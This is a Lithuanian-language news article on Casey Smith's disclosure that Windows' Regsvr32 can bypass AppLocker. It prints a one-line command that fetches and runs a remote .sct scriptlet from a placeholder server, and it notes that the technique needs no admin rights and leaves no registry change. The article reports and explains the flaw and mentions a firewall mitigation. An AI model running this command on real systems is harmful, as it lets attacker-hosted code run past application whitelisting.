Kolorado tyrinėtojas, vardu Casey Smith, išsiaiškino, kad „Regsvr32“ gali būti naudojamas apeiti „AppLocker“ „Windows 10“, ir tai yra didžiulė problema kompiuterių vartotojams, ypač esantiems verslo aplinkoje.

„AppLocker“ pirmą kartą buvo pristatyta „Windows 7“ ir „Windows Server 2008 R2“. Ji sukurta tam, kad administratoriai galėtų nurodyti, kuri grupė ar vartotojai gali naudotis kai kuriomis ar visomis programomis, remdamiesi unikalia failų tapatybe. Jei esate asmuo, linkęs naudoti „AppLocker“, tada turėtų būti gerai žinoma, kad jis gali būti naudojamas kuriant tam tikras taisykles, leidžiančias programoms paleisti ar sustabdyti jas savo trasose.

Tiems, kurie gali to nesuvokti, „Regvr32“ gali būti naudojamas registruoti ir išregistruoti DLL. Tai nėra vieno mygtuko paspaudimo įrankis, nes tai yra komandinės eilutės įrankis, todėl tik patyrę kompiuterių vartotojai turėtų stengtis pasinaudoti jo teikiamomis galimybėmis.

Mes suprantame, kad naudojant šią techniką jis nepakeičia kompiuterinės sistemos registro, todėl administratoriams tampa sunku žinoti, ar buvo atlikti pakeitimai.

regsvr32 / s / n / u /i:http://server/file.sct scrobj.dll

„Nuostabus dalykas yra tai, kad„ regsvr32 “jau žino tarpinį serverį, naudoja TLS, seka peradresavimus ir pan.… Ir… Jūs atspėjote pasirašytą, numatytąjį MS dvejetainį kodą. Taigi viskas, ką jums reikia padaryti, yra priglobti „your.sct“ failą jūsų kontroliuojamoje vietoje “, - rašė Smithas.

Aukščiau pateikta technika nereikalauja administracinių teisių ir nekeičia registro. Be to, scenarijus galima iškviesti per HTTP arba HTTPS. Šiuo metu „Microsoft“ neišleido šios mažos problemos pataisos, todėl šiuo metu vienintelė galimybė yra užblokuoti „Regsvr32“ per „Windows“ ugniasienę.

Įdomu tai, kad programinės įrangos milžinė dar turi atsakyti į šią saugos problemą, su kuria susiduria jo operacinė sistema. Dabar, kai jis atviras, tikimės išgirsti ką nors iš bendrovės kartu su derybomis apie būsimą pleistrą.